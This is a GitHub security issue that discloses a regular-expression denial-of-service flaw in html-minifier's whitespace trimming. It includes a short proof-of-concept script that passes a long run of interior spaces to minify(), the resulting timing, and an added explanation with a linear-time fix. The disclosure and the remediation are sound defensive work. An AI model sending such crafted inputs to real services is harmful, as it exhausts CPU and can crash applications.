
[Security] ReDoS Vulnerability

Open ready-research opened this issue 3 years ago • 0 comments

Hi team, I have reported a security issue in huntr 9 months back, but I didn't get any response https://www.huntr.dev/bounties/e98b8228-41bc-4304-afd6-256c6dfebf9e/ Please validate this issue using Mark as Valid. Thanks.

✍️ Description

A ReDoS (regular expression denial of service) flaw was found in html-minifier. An attacker who is able to provide crafted input to the trimWhitespace function may cause an application to consume an excessive amount of CPU.

https://github.com/kangax/html-minifier/blob/e15a892cd2f578aa281e766924fdd6f17f80f607/src/htmlminifier.js#L12

Similar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753

🕵️‍♂️ Proof of Concept

Create the following poc.js

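    // poc.js
    var htmlMinifier = require("html-minifier");

    // Build "1" + n spaces + "1": a long whitespace run that does not reach the end of the string
    function build_blank(n) {
        var ret = "1";
        for (var i = 0; i < n; i++) {
            ret += " ";
        }
        return ret + "1";
    }

    // Time a single minify() call on the crafted input (milliseconds)
    var time = Date.now();
    htmlMinifier.minify(build_blank(50000));
    var time_cost = Date.now() - time;
    console.log("time_cost: " + time_cost);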

Execute the following commands in another terminal:

    npm i html-minifier
    node poc.js

Check the Output:

    time_cost: 3794

Ideally, the time cost should be 1-10 milliseconds.

💥 Impact

This vulnerability is capable of exhausting system resources and leading to crashes.

ready-research • May 10 '22 11:05
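Why the input shape in the PoC is expensive and what a fix looks like, as an added example that is not part of the original issue and is not html-minifier's code. It assumes a trailing-whitespace trim of the form `[ \n\r\t\f]+$` as a constructed stand-in for the reported function; `WS`, `trimEndRegex`, `trimEndLinear`, `backtrackingSteps` and `buildBlank` are hypothetical names, and the step counter is a simplified model of a backtracking engine, not a measurement.

```javascript
// Added example: constructed stand-in, not code from html-minifier.
const WS = " \n\r\t\f"; // assumed whitespace set for the stand-in pattern

// Regex-based trailing trim of the kind that backtracks on long interior runs.
function trimEndRegex(str) {
  return str.replace(/[ \n\r\t\f]+$/, "");
}

// Single-pass replacement: walk back from the end once, no backtracking.
function trimEndLinear(str) {
  let end = str.length;
  while (end > 0 && WS.includes(str[end - 1])) end--;
  return str.slice(0, end);
}

// Simplified model of a backtracking engine matching /[ws]+$/:
// at each start offset it consumes the whitespace run greedily, tests `$`,
// then gives back one character at a time and retests before moving on.
function backtrackingSteps(str) {
  let steps = 0;
  for (let start = 0; start < str.length; start++) {
    let i = start;
    while (i < str.length && WS.includes(str[i])) { i++; steps++; }
    if (i === start) { steps++; continue; } // no whitespace at this offset
    for (let j = i; j > start; j--) {       // backtrack and retest `$`
      steps++;
      if (j === str.length) return steps;   // anchored match found
    }
  }
  return steps;
}

// Same input shape as the PoC above: "1" + n blanks + "1".
function buildBlank(n) {
  return "1" + " ".repeat(n) + "1";
}

// Doubling n roughly quadruples the modelled work (n^2 + n + 2 steps),
// while a run that really is trailing matches in linear time.
for (const n of [100, 200, 400]) {
  console.log(n, backtrackingSteps(buildBlank(n)));
}
console.log("trailing run:", backtrackingSteps("a" + " ".repeat(400)));
```

Both trim functions return the same string for any input, so a single-pass scan can replace the pattern without changing output.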